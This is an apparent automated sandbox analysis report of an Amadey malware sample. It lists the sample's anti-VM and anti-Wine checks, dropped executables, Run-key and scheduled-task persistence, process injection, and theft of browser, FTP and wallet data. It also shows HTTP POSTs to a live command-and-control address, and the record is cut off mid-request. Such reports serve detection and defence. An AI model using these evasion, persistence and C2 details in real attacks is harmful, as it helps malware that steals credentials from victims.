amadey | 4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	222be12d3f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	41c790c7b2.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	222be12d3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	41c790c7b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	41c790c7b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	222be12d3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe

Executes dropped EXE 7 IoCs

pid	Process
3296	explortu.exe
4024	explortu.exe
2504	222be12d3f.exe
4612	41c790c7b2.exe
1904	num.exe
3152	explortu.exe
1564	explortu.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	222be12d3f.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	41c790c7b2.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	explortu.exe

Loads dropped DLL 2 IoCs

pid	Process
1904	num.exe
1904	num.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows\CurrentVersion\Run\222be12d3f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\222be12d3f.exe"	explortu.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/4612-236-0x00000000006D0000-0x0000000000C4D000-memory.dmp	autoit_exe
behavioral2/memory/4612-264-0x00000000006D0000-0x0000000000C4D000-memory.dmp	autoit_exe
behavioral2/memory/4612-271-0x00000000006D0000-0x0000000000C4D000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
3152	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
3296	explortu.exe
4024	explortu.exe
2504	222be12d3f.exe
4612	41c790c7b2.exe
1904	num.exe
1904	num.exe
3152	explortu.exe
1564	explortu.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3296 set thread context of 4024	3296	explortu.exe	82

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explortu.job	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	num.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	num.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133637790287761328"	chrome.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3152	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
3152	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
3296	explortu.exe
3296	explortu.exe
4024	explortu.exe
4024	explortu.exe
2504	222be12d3f.exe
2504	222be12d3f.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
2696	chrome.exe
2696	chrome.exe
1904	num.exe
1904	num.exe
1904	num.exe
1904	num.exe
3152	explortu.exe
3152	explortu.exe
1564	explortu.exe
1564	explortu.exe
4744	chrome.exe
4744	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe
Token: SeShutdownPrivilege	2696	chrome.exe
Token: SeCreatePagefilePrivilege	2696	chrome.exe

Suspicious use of FindShellTrayWindow 63 IoCs

pid	Process
4612	41c790c7b2.exe
4612	41c790c7b2.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
4612	41c790c7b2.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
4612	41c790c7b2.exe
2696	chrome.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4612	41c790c7b2.exe
4612	41c790c7b2.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
4612	41c790c7b2.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
2696	chrome.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe
4612	41c790c7b2.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1904	num.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3152 wrote to memory of 3296	3152	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe	81
PID 3152 wrote to memory of 3296	3152	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe	81
PID 3152 wrote to memory of 3296	3152	4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe	81
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 4024	3296	explortu.exe	82
PID 3296 wrote to memory of 2504	3296	explortu.exe	83
PID 3296 wrote to memory of 2504	3296	explortu.exe	83
PID 3296 wrote to memory of 2504	3296	explortu.exe	83
PID 3296 wrote to memory of 4612	3296	explortu.exe	84
PID 3296 wrote to memory of 4612	3296	explortu.exe	84
PID 3296 wrote to memory of 4612	3296	explortu.exe	84
PID 4612 wrote to memory of 2696	4612	41c790c7b2.exe	85
PID 4612 wrote to memory of 2696	4612	41c790c7b2.exe	85
PID 2696 wrote to memory of 2964	2696	chrome.exe	88
PID 2696 wrote to memory of 2964	2696	chrome.exe	88
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 1628	2696	chrome.exe	89
PID 2696 wrote to memory of 3424	2696	chrome.exe	90
PID 2696 wrote to memory of 3424	2696	chrome.exe	90
PID 2696 wrote to memory of 1500	2696	chrome.exe	91
PID 2696 wrote to memory of 1500	2696	chrome.exe	91
PID 2696 wrote to memory of 1500	2696	chrome.exe	91
PID 2696 wrote to memory of 1500	2696	chrome.exe	91
PID 2696 wrote to memory of 1500	2696	chrome.exe	91
PID 2696 wrote to memory of 1500	2696	chrome.exe	91

C:\Users\Admin\AppData\Local\Temp\4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe
"C:\Users\Admin\AppData\Local\Temp\4874b19cd003189b379863746c23b357f303f7405578e0742477035b9dcc711f.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3152
- C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:4024
- - C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe
    "C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:2504
- - C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe
    "C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2696
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb30d2ab58,0x7ffb30d2ab68,0x7ffb30d2ab78
        5⤵
        
        PID:2964
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:2
        5⤵
        
        PID:1628
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
        5⤵
        
        PID:3424
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
        5⤵
        
        PID:1500
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2912 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
        5⤵
        
        PID:220
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
        5⤵
        
        PID:4744
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3796 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:1
        5⤵
        
        PID:1420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4348 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
        5⤵
        
        PID:4628
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4040 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
        5⤵
        
        PID:1172
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:8
        5⤵
        
        PID:4016
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2336 --field-trial-handle=1804,i,15526287612262146994,3022085125827364013,131072 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4744
- - C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:1904

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3184

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3152

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1564

Network

POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 160
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

